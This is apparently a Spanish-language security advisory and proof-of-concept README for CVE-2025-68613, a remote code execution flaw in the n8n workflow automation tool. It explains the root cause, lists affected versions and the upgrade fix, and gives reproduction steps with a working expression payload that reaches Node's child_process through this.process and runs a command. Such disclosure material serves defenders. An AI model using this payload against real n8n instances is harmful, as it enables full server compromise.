
Exploit de prueba de concepto para CVE-2025-68613, una RCE crítica en la automatización de flujos de trabajo n8n. Demuestra la ejecución arbitraria de comandos mediante la evasión del evaluador de expresiones en versiones anteriores a la 1.122.0.
Aviso de Seguridad: Vulnerabilidad Crítica de Ejecución Remota de Código en n8n (CVE-2025-68613)
Se ha identificado una vulnerabilidad crítica en la herramienta de automatización de flujos de trabajo n8n que permite la ejecución arbitraria de código. Los usuarios autenticados con permisos para crear o editar flujos de trabajo pueden explotar esta falla para obtener control sobre el sistema que ejecuta la instancia de n8n. Resumen
| ID de CVE | CVE-2025-68613 |
| Vulnerabilidad | Control Inadecuado de Recursos de Código Gestionados Dinámicamente |
| Gravedad | Crítica |
| Impacto | Ejecución Arbitraria de Comandos, Compromiso Completo del Sistema |
| Causa Raíz | El evaluador de expresiones no sanitiza el acceso al objeto de proceso de Node.js subyacente (this.process), lo que permite a un atacante requerir y usar módulos del sistema como child_process. |
Impacto
Un atacante que explote exitosamente esta vulnerabilidad puede lograr lo siguiente:
Versiones Afectadas y Parcheadas
| Estado | Versión(es) |
|---|---|
| Vulnerable | Todas las versiones anteriores a la 1.122.0 |
| Parcheada | Versión 1.122.0 y posteriores |
Mitigación
Es fundamental actualizar su instancia de n8n a la versión 1.122.0 o posterior inmediatamente para resolver esta vulnerabilidad.
Detalles del Exploit para CVE-2025-68613
Este directorio contiene una prueba de concepto para la vulnerabilidad de Ejecución Remota de Código (RCE) en n8n (CVE-2025-68613). Requisitos
Pasos para Reproducir
Crear un Flujo de Trabajo:
Agregar Nodos:
Configurar el Nodo Set:
result.Inyectar el Payload del Exploit:
result, pegue el siguiente payload:Exploit:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Ejecutar y Verificar:
id, confirmando la ejecución de código.